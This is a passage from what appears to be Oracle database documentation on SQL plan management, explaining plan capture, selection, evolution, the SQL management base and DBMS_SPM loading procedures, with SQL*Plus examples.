  • If this plan does match a plan in the SQL plan baseline, then nothing is added to the SQL plan baseline.

The following graphic shows the decision tree for automatic initial plan capture when OPTIMIZER_USE_SQL_PLAN_BASELINES is set to true (see "Plan Selection" for more information):

[Graphic: tgsql_vm_004.png]

Note: The settings of OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES and OPTIMIZER_USE_SQL_PLAN_BASELINES are independent. For example, if OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES is true, then the database creates initial plan baselines regardless of whether OPTIMIZER_USE_SQL_PLAN_BASELINES is true or false.

See Also: Oracle Database Reference to learn about the OPTIMIZER_USE_SQL_PLAN_BASELINES initialization parameter

23.1.2.2 Manual Plan Capture

In SQL plan management, manual plan capture refers to the user-initiated bulk load of existing plans into a SQL plan baseline. Use Cloud Control or PL/SQL to load the execution plans for SQL statements from a SQL tuning set (STS), the shared SQL area, a staging table, or a stored outline.

The following graphic illustrates loading plans into a SQL plan baseline:

[Graphic: tgsql_vm_007.png]

The loading behavior varies depending on whether a SQL plan baseline exists for each statement represented in the bulk load:

• If a baseline for the statement does not exist, then the database does the following:

  1. Creates a plan history and plan baseline for the statement
  2. Marks the initial plan for the statement as accepted
  3. Adds the plan to the new baseline

• If a baseline for the statement exists, then the database does the following:

  1. Marks the loaded plan as accepted
  2. Adds the plan to the plan baseline for the statement without verifying the plan's performance

Manually loaded plans are always marked accepted because the optimizer assumes that any plan loaded manually by the administrator has acceptable performance.

23.1.3 Plan Selection

SQL plan selection is the optimizer's ability to detect plan changes based on stored plan history, and the use of SQL plan baselines to select plans to avoid potential performance regressions.

When the database performs a hard parse of a SQL statement, the optimizer generates a best-cost plan. By default, the optimizer then attempts to find a matching plan in the SQL plan baseline for the statement. If no plan baseline exists, then the database runs the statement with the best-cost plan. If a plan baseline exists, then the optimizer behavior depends on whether the newly generated plan is in the plan baseline:

• If the new plan is in the baseline, then the database executes the statement using the found plan.

• If the new plan is not in the baseline, then the optimizer marks the newly generated plan as unaccepted and adds it to the plan history.
Optimizer behavior then depends on the contents of the plan baseline:

• If fixed plans exist in the plan baseline, then the optimizer uses the fixed plan (see "Fixed Plans") with the lowest cost.

• If no fixed plans exist in the plan baseline, then the optimizer uses the baseline plan with the lowest cost.

• If no reproducible plans exist in the plan baseline, which could happen if every plan in the baseline referred to a dropped index, then the optimizer uses the newly generated cost-based plan.

The following graphic shows the decision tree for SQL plan selection:

[Graphic: tgsql_vm_003.png]

23.1.4 Plan Evolution

In general, SQL plan evolution is the process by which the optimizer verifies new plans and adds them to an existing SQL plan baseline. Specifically, plan evolution consists of the following distinct steps:

1. Verifying that unaccepted plans perform at least as well as accepted plans in a SQL plan baseline (known as plan verification)

2. Adding unaccepted plans to the plan baseline as accepted plans after the database has proved that they perform as well as accepted plans

In the standard case of plan evolution, the optimizer performs the preceding steps sequentially, so that a new plan is not usable by SQL plan management until the optimizer verifies plan performance relative to the SQL plan baseline. However, you can configure SQL plan management to perform one step without performing the other.

The following graphic shows the possible paths for plan evolution:

[Graphic: tgsql_vm_023.png]

23.1.4.1 Purpose of Plan Evolution

Typically, a SQL plan baseline for a SQL statement starts with a single accepted plan. However, some SQL statements perform well when executed with different plans under different conditions. For example, a SQL statement with bind variables whose values result in different selectivities may have several optimal plans. Creating a materialized view or an index, or repartitioning a table, may make current plans more expensive than other plans.

If new plans were never added to SQL plan baselines, then the performance of some SQL statements might degrade. Thus, it is sometimes necessary to evolve newly accepted plans into SQL plan baselines. Plan evolution prevents performance regressions by verifying the performance of a new plan before including it in a SQL plan baseline.

23.1.4.2 PL/SQL Procedures for Plan Evolution

The DBMS_SPM package provides procedures and functions for plan evolution. These procedures use the task infrastructure. For example, CREATE_EVOLVE_TASK creates an evolution task, whereas EXECUTE_EVOLVE_TASK executes it. All task evolution procedures have the string EVOLVE_TASK in the name.

Use the evolve procedures on demand, or configure the procedures to run automatically. The automatic maintenance task SYS_AUTO_SPM_EVOLVE_TASK executes daily in the scheduled maintenance window. The task performs the following actions automatically:

1. Selects and ranks unaccepted plans for verification
2. Accepts each plan if it satisfies the performance threshold

23.1.5 Storage Architecture for SQL Plan Management

This section describes the SQL plan management storage architecture.

23.1.5.1 SQL Management Base

The SQL management base (SMB) is a logical repository in the data dictionary that contains the following:

• SQL statement log, which contains only SQL IDs
• SQL plan history, which includes the SQL plan baselines
• SQL profiles
• SQL patches

The SMB stores information that the optimizer can use to maintain or improve SQL performance. The SMB resides in the SYSAUX tablespace and uses automatic segment-space management. Because the SMB is located entirely within the SYSAUX tablespace, the database does not use SQL plan management and SQL tuning features when this tablespace is unavailable.

The following graphic illustrates the SMB architecture:

[Graphic: tgsql_vm_002.png]

Note: Data visibility and privilege requirements may differ when using the SMB with pluggable databases. See Oracle Database Administrator's Guide for a table that summarizes how manageability features work in a container database (CDB).

See Also: Oracle Database Administrator's Guide to learn about the SYSAUX tablespace

23.1.5.2 SQL Statement Log

When automatic SQL plan capture is enabled, the SQL statement log contains the SQL ID of SQL statements that the optimizer has evaluated over time. The database tracks a statement when its SQL ID exists in the SQL statement log. When the database parses or executes a statement that is tracked, the database recognizes it as a repeatable SQL statement.

Example 23-1 Logging SQL Statements

This example illustrates how the database tracks statements in the statement log and creates baselines automatically for repeatable statements. An initial query of the statement log shows no tracked SQL statements. After a query of hr.jobs for AD_PRES, the log shows one tracked statement.

SQL> ALTER SYSTEM SET OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES=true;

System altered.

SQL> SELECT * FROM SQLLOG$;

no rows selected

SQL> SELECT job_title FROM hr.jobs WHERE job_id = 'AD_PRES';

JOB_TITLE
-----------------------------------
President

SQL> SELECT * FROM SQLLOG$;

 SIGNATURE     BATCH#
---------- ----------
1.8096E+19          1

Now the session executes a different jobs query. The log shows two tracked statements:

SQL> SELECT job_title FROM hr.jobs WHERE job_id='PR_REP';

JOB_TITLE
-----------------------------------
Public Relations Representative

SQL> SELECT * FROM SQLLOG$;

 SIGNATURE     BATCH#
---------- ----------
1.7971E+19          1
1.8096E+19          1

A query of DBA_SQL_PLAN_BASELINES shows that no baseline for either statement exists because neither statement is repeatable:

SQL> SELECT SQL_HANDLE, SQL_TEXT
  2  FROM DBA_SQL_PLAN_BASELINES
  3  WHERE SQL_TEXT LIKE 'SELECT job_title%';

no rows selected

The session executes the query for job_id='PR_REP' a second time. Because this statement is now repeatable, and because automatic SQL plan capture is enabled, the database creates a plan baseline for this statement. The query for job_id='AD_PRES' has only been executed once, so no plan baseline exists for it.
SQL> SELECT job_title FROM hr.jobs WHERE job_id='PR_REP';

JOB_TITLE
-----------------------------------
Public Relations Representative

SQL> SELECT SQL_HANDLE, SQL_TEXT
  2  FROM DBA_SQL_PLAN_BASELINES
  3  WHERE SQL_TEXT LIKE 'SELECT job_title%';

SQL_HANDLE           SQL_TEXT
-------------------- --------------------
SQL_f9676a330f972dd5 SELECT job_title FRO
                     M hr.jobs WHERE job_
                     id='PR_REP'

23.1.5.3 SQL Plan History

The SQL plan history is the set of plans generated for a repeatable SQL statement over time. The history contains both SQL plan baselines and unaccepted plans. In SQL plan management, the database detects plan changes and records the new plan in the history so that the DBA can manually evolve (verify) it. Because ad hoc SQL statements do not repeat and so do not have performance degradation, the database maintains plan history only for repeatable SQL statements.

Starting in Oracle Database 12c Release 1 (12.1), the SMB stores the plan rows for new plans added to the plan history of a SQL statement. The DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE function fetches and displays the plan from the SMB. For plans created before Oracle Database 12c Release 1 (12.1), the function must compile the SQL statement and generate the plan because the SMB does not store the rows.

23.1.5.3.1 Enabled Plans

An enabled plan is eligible for use by the optimizer. The database automatically marks all plans in the plan history as enabled even if they are still unaccepted. You can manually change an enabled plan to a disabled plan, which means the optimizer can no longer use the plan even if it is accepted.

23.1.5.3.2 Accepted Plans

A plan is accepted if and only if it is in the plan baseline. The plan history for a statement contains all plans, both accepted and unaccepted. After the optimizer generates the first accepted plan in a plan baseline, every subsequent unaccepted plan is added to the plan history, awaiting verification, but is not in the SQL plan baseline.

Figure 23-1 shows plan histories for three different SQL statements. The SQL plan baseline for one statement contains two accepted plans. The plan history for this statement includes two unaccepted plans. A DBA has marked one unaccepted plan as disabled so that the optimizer cannot use it.

Figure 23-1 SQL Plan Management Architecture [graphic omitted]

23.1.5.3.3 Fixed Plans

A fixed plan is an accepted plan that is marked as preferred, so that the optimizer considers only the fixed plans in the baseline. Fixed plans influence the plan selection process of the optimizer.

Assume that three plans exist in the SQL plan baseline for a statement. You want the optimizer to give preferential treatment to only two of the plans. As shown in Figure 23-2, you mark these two plans as fixed so that the optimizer uses only the best plan from these two, ignoring the other plans.

If new plans are added to a baseline that contains at least one enabled fixed plan, then the optimizer cannot use the new plans until you manually declare them as fixed.
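The chapter does not show the call for fixing a plan at this point, but the FIXED attribute can be changed with DBMS_SPM.ALTER_SQL_PLAN_BASELINE. A minimal sketch, reusing the SQL handle and plan name that appear in the examples later in this chapter as hypothetical inputs:

DECLARE
  v_plans_altered NUMBER;
BEGIN
  -- Hypothetical identifiers; look them up in DBA_SQL_PLAN_BASELINES first.
  v_plans_altered := DBMS_SPM.ALTER_SQL_PLAN_BASELINE(
    sql_handle      => 'SQL_a8632bd857a4a25e',
    plan_name       => 'SQL_PLAN_ahstbv1bu98ky1694fc6b',
    attribute_name  => 'fixed',
    attribute_value => 'YES' );
  DBMS_OUTPUT.PUT_LINE('Plans altered: ' || v_plans_altered);
END;
/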
23.1.6 User Interfaces for SQL Plan Management

Access the DBMS_SPM package through Cloud Control or through the command line.

23.1.6.1 SQL Plan Baseline Page in Cloud Control

The SQL Plan Control page in Cloud Control is a GUI that shows information about SQL profiles, SQL patches, and SQL plan baselines.

To access the SQL Plan Baseline page:

1. Access the Database Home page, as described in "Accessing the Database Home Page in Cloud Control."

2. From the Performance menu, select SQL, then SQL Plan Control.

   The SQL Plan Control page appears.

3. Click Files to view the SQL Plan Baseline subpage, shown in Figure 23-3.

   Figure 23-3 SQL Plan Baseline Subpage [graphic omitted]

You can perform most SQL plan management tasks in this page or in pages accessed through this page.

23.1.6.2 DBMS_SPM Package

On the command line, use the DBMS_SPM and DBMS_XPLAN PL/SQL packages to perform most SQL plan management tasks. Table 23-1 describes the most relevant DBMS_SPM procedures and functions for creating, dropping, and loading SQL plan baselines.

Table 23-1 DBMS_SPM Procedures and Functions

• DBMS_SPM.CONFIGURE: This procedure changes configuration options for the SMB in name/value format.
• DBMS_SPM.CREATE_STGTAB_BASELINE: This procedure creates a staging table that enables you to transport SQL plan baselines from one database to another.
• DBMS_SPM.DROP_SQL_PLAN_BASELINE: This function drops some or all plans in a plan baseline.
• DBMS_SPM.LOAD_PLANS_FROM_CURSOR_CACHE: This function loads plans in the shared SQL area (also called the cursor cache) into SQL plan baselines.
• DBMS_SPM.LOAD_PLANS_FROM_SQLSET: This function loads plans in an STS into SQL plan baselines.
• DBMS_SPM.PACK_STGTAB_BASELINE: This function packs SQL plan baselines, which means that it copies them from the SMB into a staging table.
• DBMS_SPM.UNPACK_STGTAB_BASELINE: This function unpacks SQL plan baselines, which means that it copies SQL plan baselines from a staging table into the SMB.
• DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE: This function displays one or more execution plans for the SQL statement identified by SQL handle.

"About the DBMS_SPM Evolve Functions" describes the functions related to SQL plan evolution.
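As a quick illustration of calling one of these functions from SQL*Plus, here is a minimal sketch that drops the plans in a single baseline; the SQL handle is a hypothetical value of the kind shown in the examples later in this chapter:

DECLARE
  v_plans_dropped NUMBER;
BEGIN
  -- Omitting plan_name drops every plan recorded under this handle.
  v_plans_dropped := DBMS_SPM.DROP_SQL_PLAN_BASELINE(
    sql_handle => 'SQL_a8632bd857a4a25e' );
  DBMS_OUTPUT.PUT_LINE('Plans dropped: ' || v_plans_dropped);
END;
/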
See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM package

23.1.7 Basic Tasks in SQL Plan Management

This section explains the basic tasks in using SQL plan management to prevent plan regressions and permit the optimizer to consider new plans.

23.2 Configuring SQL Plan Management

23.2.1 Configuring the Capture and Use of SQL Plan Baselines

You control SQL plan management with initialization parameters. The default values are as follows:

• OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES=false

  For any repeatable SQL statement that does not already exist in the plan history, the database does not automatically create an initial SQL plan baseline for the statement. See "Automatic Initial Plan Capture".

• OPTIMIZER_USE_SQL_PLAN_BASELINES=true

  For any SQL statement that has an existing SQL plan baseline, the database automatically adds new plans to the SQL plan baseline as nonaccepted plans. See "Plan Selection".

Note: The settings of the preceding parameters are independent of each other. For example, if OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES is true, then the database creates initial plan baselines for new statements even if OPTIMIZER_USE_SQL_PLAN_BASELINES is false.

If the default behavior is what you intend, then skip this section. The following sections explain how to change the default parameter settings from the command line. If you use Cloud Control, then set these parameters in the SQL Plan Baseline subpage (shown in Figure 23-3).

23.2.1.1 Enabling Automatic Initial Plan Capture for SQL Plan Management

Setting the OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES initialization parameter to true is all that is necessary for the database to automatically create an initial SQL plan baseline for any SQL statement not already in the plan history. This parameter does not control the automatic addition of newly discovered plans to a previously created SQL plan baseline.

Caution: When automatic baseline capture is enabled, the database creates a SQL plan baseline for every repeatable statement, including all recursive SQL and monitoring SQL. Thus, automatic capture may result in the creation of an extremely large number of plan baselines.

To enable automatic initial plan capture for SQL plan management:

1. Connect SQL*Plus to the database with the appropriate privileges, and then show the current settings for SQL plan management.

   For example, connect SQL*Plus to the database with administrator privileges and execute the following command (sample output included):

   SQL> SHOW PARAMETER SQL_PLAN

   NAME                                 TYPE        VALUE
   ------------------------------------ ----------- -----
   optimizer_capture_sql_plan_baselines boolean     FALSE
   optimizer_use_sql_plan_baselines     boolean     TRUE

   If the parameters are set as you intend, then skip the remaining steps.

2. To enable the automatic recognition of repeatable SQL statements and the generation of SQL plan baselines for these statements, enter the following statement:

   SQL> ALTER SYSTEM SET OPTIMIZER_CAPTURE_SQL_PLAN_BASELINES=true;

23.2.1.2 Disabling All SQL Plan Baselines

When you set the OPTIMIZER_USE_SQL_PLAN_BASELINES initialization parameter to false, the database does not use any plan baselines in the database. Typically, you might want to disable one or two plan baselines, but not all of them. A possible use case might be testing the benefits of SQL plan management.

To disable all SQL plan baselines in the database:

1. Connect SQL*Plus to the database with the appropriate privileges, and then show the current settings for SQL plan management.

   For example, connect SQL*Plus to the database with administrator privileges and execute the following command (sample output included):

   SQL> SHOW PARAMETER SQL_PLAN

   NAME                                 TYPE        VALUE
   ------------------------------------ ----------- -----
   optimizer_capture_sql_plan_baselines boolean     FALSE
   optimizer_use_sql_plan_baselines     boolean     TRUE

   If the parameters are set as you intend, then skip the remaining steps.

2. To ignore all existing plan baselines, enter the following statement:

   SQL> ALTER SYSTEM SET OPTIMIZER_USE_SQL_PLAN_BASELINES=false;

See Also: Oracle Database Reference to learn about the SQL plan baseline initialization parameters

23.2.2 Managing the SPM Evolve Advisor Task

SPM Evolve Advisor is a SQL advisor that evolves plans that have recently been added to the SQL plan baseline. The advisor simplifies plan evolution by eliminating the requirement to do it manually.

By default, SYS_AUTO_SPM_EVOLVE_TASK runs daily in the scheduled maintenance window. The SPM Evolve Advisor task ranks all unaccepted plans, and then performs test executions of as many plans as possible during the window. The evolve task selects the lowest-cost plan to compare against each unaccepted plan. If a plan performs sufficiently better than the existing accepted plan, then the database automatically accepts it. The task can accept more than one plan.
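To see what the automatic task has been doing, you can generate its report with the DBMS_SPM.REPORT_EVOLVE_TASK function described later in this chapter. A minimal sketch; the task name is the standard SYS_AUTO_SPM_EVOLVE_TASK, and the type and section arguments shown are assumptions about reasonable defaults:

SET LONG 1000000 PAGESIZE 1000 LONGCHUNKSIZE 100000

-- Report on the most recent execution of the automatic evolve task.
SELECT DBMS_SPM.REPORT_EVOLVE_TASK(
         task_name => 'SYS_AUTO_SPM_EVOLVE_TASK',
         type      => 'TEXT',
         section   => 'ALL' ) AS report
FROM   DUAL;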
23.2.2.1 Enabling and Disabling the SPM Evolve Advisor Task

No separate scheduler client exists for the Automatic SPM Evolve Advisor task. One client controls both Automatic SQL Tuning Advisor and Automatic SPM Evolve Advisor. Thus, the same task enables or disables both. See "Enabling and Disabling the Automatic SQL Tuning Task" to learn how to enable and disable Automatic SPM Evolve Advisor.

23.2.2.2 Configuring the Automatic SPM Evolve Advisor Task

The DBMS_SPM package enables you to configure automatic plan evolution by specifying the task parameters using the SET_EVOLVE_TASK_PARAMETER procedure. Because the task is owned by SYS, only SYS can set task parameters.

The ACCEPT_PLANS tuning task parameter specifies whether to accept recommended plans automatically. When ACCEPT_PLANS is true (default), SQL plan management automatically accepts all plans recommended by the task. When set to false, the task verifies the plans and generates a report of its findings, but does not evolve the plans.

Assumptions

The tutorial in this section assumes the following:

• You do not want the database to evolve plans automatically.
• You want the task to time out after 1200 seconds per execution.

To set automatic evolution task parameters:

1. Connect SQL*Plus to the database with the appropriate privileges, and then optionally query the current task settings.

   For example, connect SQL*Plus to the database with administrator privileges and execute the following query:

   COL PARAMETER_NAME FORMAT a25
   COL VALUE FORMAT a10

   SELECT PARAMETER_NAME, PARAMETER_VALUE AS "VALUE"
   FROM   DBA_ADVISOR_PARAMETERS
   WHERE  ( (TASK_NAME = 'SYS_AUTO_SPM_EVOLVE_TASK') AND
            ( (PARAMETER_NAME = 'ACCEPT_PLANS') OR
              (PARAMETER_NAME = 'TIME_LIMIT') ) );

   Sample output appears as follows:

   PARAMETER_NAME            VALUE
   ------------------------- ----------
   ACCEPT_PLANS              TRUE
   TIME_LIMIT                3600

2. Set parameters using PL/SQL code of the following form:

   BEGIN
     DBMS_SPM.SET_EVOLVE_TASK_PARAMETER(
       task_name => 'SYS_AUTO_SPM_EVOLVE_TASK',
       parameter => parameter_name,
       value     => value);
   END;
   /

   For example, the following PL/SQL block sets a time limit of 20 minutes, and also specifies that recommended plans are not accepted automatically:

   BEGIN
     DBMS_SPM.SET_EVOLVE_TASK_PARAMETER('SYS_AUTO_SPM_EVOLVE_TASK',
                                        'LOCAL_TIME_LIMIT', 1200);
     DBMS_SPM.SET_EVOLVE_TASK_PARAMETER('SYS_AUTO_SPM_EVOLVE_TASK',
                                        'ACCEPT_PLANS', 'false');
   END;
   /

See Also: Oracle Database PL/SQL Packages and Types Reference for complete reference information for DBMS_SPM

23.3 Displaying Plans in a SQL Plan Baseline

To view the plans stored in the SQL plan baseline for a specific statement, use the DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE function. This function uses plan information stored in the plan history to display the plans. Table 23-2 describes some function parameters.

Table 23-2 DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE Parameters

• sql_handle: SQL handle of the statement. Retrieve the SQL handle by joining the V$SQL.SQL_PLAN_BASELINE and DBA_SQL_PLAN_BASELINES views on the PLAN_NAME columns.
• plan_name: Name of the plan for the statement.

This section explains how to show plans in a baseline from the command line. If you use Cloud Control, then display plan baselines from the SQL Plan Baseline subpage shown in Figure 23-3.

To display SQL plans:

1. Connect SQL*Plus to the database with the appropriate privileges, and then obtain the SQL ID of the query whose plan you want to display.

   For example, assume that a SQL plan baseline exists for a SELECT statement with the SQL ID 31d96zzzpcys9.
2. Query the plan by SQL ID.

   The following query displays execution plans for the statement with the SQL ID 31d96zzzpcys9:

   SELECT PLAN_TABLE_OUTPUT
   FROM   V$SQL s, DBA_SQL_PLAN_BASELINES b,
          TABLE(
            DBMS_XPLAN.DISPLAY_SQL_PLAN_BASELINE(b.sql_handle, b.plan_name, 'basic')
          ) t
   WHERE  s.EXACT_MATCHING_SIGNATURE = b.SIGNATURE
   AND    b.PLAN_NAME = s.SQL_PLAN_BASELINE
   AND    s.SQL_ID = '31d96zzzpcys9';

   The sample query results are as follows:

   PLAN_TABLE_OUTPUT
   -------------------------------------------------------------------------------
   SQL handle: SQL_513f7f8a91177b1a
   SQL text: select * from hr.employees where employee_id=100
   -------------------------------------------------------------------------------
   -------------------------------------------------------------------------------
   Plan name: SQL_PLAN_52gvzja8jfysuc0e983c6         Plan id: 3236529094
   Enabled: YES     Fixed: NO     Accepted: YES     Origin: AUTO-CAPTURE
   -------------------------------------------------------------------------------

   Plan hash value: 3236529094

   -----------------------------------------------------
   | Id  | Operation                   | Name          |
   -----------------------------------------------------
   |   0 | SELECT STATEMENT            |               |
   |   1 |  TABLE ACCESS BY INDEX ROWID| EMPLOYEES     |
   |   2 |   INDEX UNIQUE SCAN         | EMP_EMP_ID_PK |
   -----------------------------------------------------

   The results show that the plan for SQL ID 31d96zzzpcys9 is named SQL_PLAN_52gvzja8jfysuc0e983c6 and was captured automatically.

23.4 Loading SQL Plan Baselines

You can initiate a bulk load of a set of existing plans into a SQL plan baseline. The goal of this task is to load plans from the following sources:

• SQL tuning set (STS)

  Capture the plans for a SQL workload into an STS, and then load the plans into the SQL plan baselines. The optimizer uses the plans the next time that the database executes the SQL statements. Bulk loading execution plans from an STS is an effective way to prevent plan regressions after a database upgrade.

  Note: You can load plans from Automatic Workload Repository snapshots into an STS, and then load plans from the STS into the SQL plan baseline.

• Shared SQL area

  Load plans for statements directly from the shared SQL area, which is in the shared pool of the SGA. By applying a filter on the module name, the schema, or the SQL ID, you identify the SQL statement or set of SQL statements to capture. The optimizer uses the plans the next time that the database executes the SQL statements.

  Loading plans directly from the shared SQL area is useful when application SQL has been hand-tuned using hints. Because you probably cannot change the SQL to include the hint, populating the SQL plan baseline ensures that the application SQL uses optimal plans.

• Staging table

  Use the DBMS_SPM package to define a staging table, DBMS_SPM.PACK_STGTAB_BASELINE to copy the baselines into a staging table, and Oracle Data Pump to transfer the table to another database. On the destination database, use DBMS_SPM.UNPACK_STGTAB_BASELINE to unpack the plans from the staging table and put the baselines into the SMB.

  A use case is the introduction of new SQL statements into the database from a new application module. A vendor can ship application software with SQL plan baselines for the new SQL. In this way, the new SQL uses plans that are known to give optimal performance under a standard test configuration.
  Alternatively, if you develop or test an application in-house, export the correct plans from the test database and import them into the production database.

• Stored outline

  Migrate stored outlines to SQL plan baselines. After the migration, you maintain the same plan stability that you had using stored outlines, while being able to use the more advanced features provided by SQL Plan Management, such as plan evolution. See "Migrating Stored Outlines to SQL Plan Baselines".

See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM.PACK_STGTAB_BASELINE function

23.4.1 Loading Plans from a SQL Tuning Set

A SQL tuning set is a database object that includes one or more SQL statements, execution statistics, and execution context. This section explains how to load plans from an STS.

Load plans with the DBMS_SPM.LOAD_PLANS_FROM_SQLSET function or using Cloud Control. Table 23-3 describes some function parameters.

Table 23-3 LOAD_PLANS_FROM_SQLSET Parameters

• sqlset_name: Name of the STS from which the plans are loaded into SQL plan baselines.
• basic_filter: A filter applied to the STS to select only qualifying plans to be loaded. The filter can take the form of any WHERE clause predicate that can be specified against the view DBA_SQLSET_STATEMENTS.
• fixed: The default NO means the loaded plans are used as nonfixed plans. YES means the loaded plans are fixed plans. "Plan Selection" explains that the optimizer chooses a fixed plan in the plan baseline over a nonfixed plan.

This section explains how to load plans from the command line. In Cloud Control, go to the SQL Plan Baseline subpage (shown in Figure 23-3) and click Load to load plan baselines from SQL tuning sets.

Assumptions

This tutorial assumes the following:

• You want the loaded plans to be nonfixed.

• You have executed the following query:

  SELECT /*LOAD_STS*/ *
  FROM sh.sales
  WHERE quantity_sold > 40
  ORDER BY prod_id;

• You have loaded the plan from the shared SQL area into the SQL tuning set named SPM_STS, which is owned by user SPM.

To load plans from a SQL tuning set:

1. Connect SQL*Plus to the database with the appropriate privileges, and then verify which plans are in the SQL tuning set.

   For example, query DBA_SQLSET_STATEMENTS for the STS name (sample output included):

   SELECT SQL_TEXT
   FROM   DBA_SQLSET_STATEMENTS
   WHERE  SQLSET_NAME = 'SPM_STS';

   SQL_TEXT
   --------------------
   SELECT /*LOAD_STS*/
   *
   FROM sh.sales
   WHERE quantity_sold
   > 40
   ORDER BY prod_id

   The output shows that the plan for the select /*LOAD_STS*/ statement is in the STS.

2. Load the plan from the STS into the SQL plan baseline.

   For example, in SQL*Plus execute the function as follows:

   VARIABLE cnt NUMBER
   EXECUTE :cnt := DBMS_SPM.LOAD_PLANS_FROM_SQLSET( -
                     sqlset_name  => 'SPM_STS', -
                     basic_filter => 'sql_text like ''SELECT /*LOAD_STS*/%''' );

   The basic_filter parameter specifies a WHERE clause that loads only the plans for the queries of interest. The variable cnt stores the number of plans loaded from the STS.

3. Query the data dictionary to ensure that the plan was loaded into the baseline for the statement.

   Example 23-2 executes the following query (sample output included).
Example 23-2 DBA_SQL_PLAN_BASELINES

SQL> SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME,
  2         ORIGIN, ENABLED, ACCEPTED
  3  FROM   DBA_SQL_PLAN_BASELINES;

SQL_HANDLE           SQL_TEXT             PLAN_NAME                      ORIGIN      ENA ACC
-------------------- -------------------- ------------------------------ ----------- --- ---
SQL_a8632bd857a4a25e SELECT /*LOAD_STS*/  SQL_PLAN_ahstbv1bu98ky1694fc6b MANUAL-LOAD YES YES
                     *
                     FROM sh.sales
                     WHERE quantity_sold
                     > 40
                     ORDER BY prod_id

The output shows that the plan is accepted, which means that it is in the plan baseline. Also, the origin is MANUAL-LOAD, which means that the plan was loaded by an end user rather than automatically captured.

4. Optionally, drop the STS.

   For example, execute DBMS_SQLTUNE.DROP_SQLSET to drop the SPM_STS tuning set as follows:

   EXEC SYS.DBMS_SQLTUNE.DROP_SQLSET( sqlset_name  => 'SPM_STS', -
                                      sqlset_owner => 'SPM' );

See Also: Oracle Database PL/SQL Packages and Types Reference to learn about the DBMS_SPM.LOAD_PLANS_FROM_SQLSET function

23.4.2 Loading Plans from the Shared SQL Area

This section explains how to load plans from the shared SQL area using PL/SQL. Load plans with the LOAD_PLANS_FROM_CURSOR_CACHE function of the DBMS_SPM package. Table 23-4 describes some function parameters.

Table 23-4 LOAD_PLANS_FROM_CURSOR_CACHE Parameters

• sql_id: SQL statement identifier. Identifies a SQL statement in the shared SQL area.
• fixed: The default NO means the loaded plans are used as nonfixed plans. YES means the loaded plans are fixed plans (see "Fixed Plans"). "Plan Selection" explains that the optimizer chooses a fixed plan in the plan baseline over a nonfixed plan.

This section explains how to load plans using the command line. In Cloud Control, go to the SQL Plan Baseline subpage (shown in Figure 23-3) and click Load to load plan baselines from the shared SQL area.

Assumptions

This tutorial assumes the following:

• You have executed the following query:

  SELECT /*LOAD_CC*/ *
  FROM sh.sales
  WHERE quantity_sold > 40
  ORDER BY prod_id;

• You want the loaded plans to be nonfixed.

To load plans from the shared SQL area:

1. Connect SQL*Plus to the database with the appropriate privileges, and then determine the SQL IDs of the relevant statements in the shared SQL area.

   For example, query V$SQL for the SQL ID of the sh.sales query (sample output included):

   SELECT SQL_ID, CHILD_NUMBER AS "Child Num",
          PLAN_HASH_VALUE AS "Plan Hash",
          OPTIMIZER_ENV_HASH_VALUE AS "Opt Env Hash"
   FROM   V$SQL
   WHERE  SQL_TEXT LIKE 'SELECT /*LOAD_CC*/%';

   SQL_ID        Child Num  Plan Hash Opt Env Hash
   ------------- ---------- ---------- ------------
   27m0sdw9snw59          0 1421641795   3160571937

   The preceding output shows that the SQL ID of the statement is 27m0sdw9snw59.

2. Load the plans for the specified statements into the SQL plan baseline.

   For example, execute the LOAD_PLANS_FROM_CURSOR_CACHE function in SQL*Plus to load the plan for the statement with the SQL ID 27m0sdw9snw59:

   VARIABLE cnt NUMBER
   EXECUTE :cnt := DBMS_SPM.LOAD_PLANS_FROM_CURSOR_CACHE( -
                     sql_id => '27m0sdw9snw59');

   In the preceding example, the variable cnt contains the number of plans that were loaded.

3. Query the data dictionary to ensure that the plans were loaded into the baseline for the statement.

   Example 23-3 queries DBA_SQL_PLAN_BASELINES (sample output included).
Example 23-3 DBA_SQL_PLAN_BASELINES

SELECT SQL_HANDLE, SQL_TEXT, PLAN_NAME,
       ORIGIN, ENABLED, ACCEPTED
FROM   DBA_SQL_PLAN_BASELINES;

SQL_HANDLE           SQL_TEXT             PLAN_NAME                      ORIGIN      ENA ACC
-------------------- -------------------- ------------------------------ ----------- --- ---
SQL_a8632bd857a4a25e SELECT /*LOAD_CC*/   SQL_PLAN_gdkvzfhrgkda71694fc6b MANUAL-LOAD YES YES
                     *
                     FROM sh.sales
                     WHERE quantity_sold
                     > 40
                     ORDER BY prod_id

The output shows that the plan is accepted, which means that it is in the plan baseline for the statement. Also, the origin is MANUAL-LOAD, which means that the statement was loaded by an end user rather than automatically captured.

See Also: Oracle Database PL/SQL Packages and Types Reference to learn how to use the DBMS_SPM.LOAD_PLANS_FROM_CURSOR_CACHE function

23.4.3 Loading Plans from a Staging Table

You may want to transfer optimal plans from a source database to a different destination database. For example, you may have investigated a set of plans on a test database and confirmed that they have performed well. You may then want to load these plans into a production database.

A staging table is a table that, for the duration of its existence, stores plans so that the plans do not disappear from the table while you are unpacking them. Use the DBMS_SPM.CREATE_STGTAB_BASELINE procedure to create a staging table. To pack (insert rows into) and unpack (extract rows from) the staging table, use the PACK_STGTAB_BASELINE and UNPACK_STGTAB_BASELINE functions of the DBMS_SPM package. Oracle Data Pump Import and Export enable you to copy the staging table to a different database. The following graphic depicts the basic steps:

[Graphic: tgsql_vm_006.png]

Assumptions

This tutorial assumes the following:

• You want to create a staging table named stage1 in the source database.
• You want to load all plans owned by user spm into the staging table.
• You want to transfer the staging table to a destination database.
• You want to load the plans in stage1 as fixed plans.

To transfer a set of SQL plan baselines from one database to another:

1. Connect SQL*Plus to the source database with the appropriate privileges, and then create a staging table using the CREATE_STGTAB_BASELINE procedure.

   The following example creates a staging table named stage1:

   BEGIN
     DBMS_SPM.CREATE_STGTAB_BASELINE (
       table_name => 'stage1');
   END;
   /

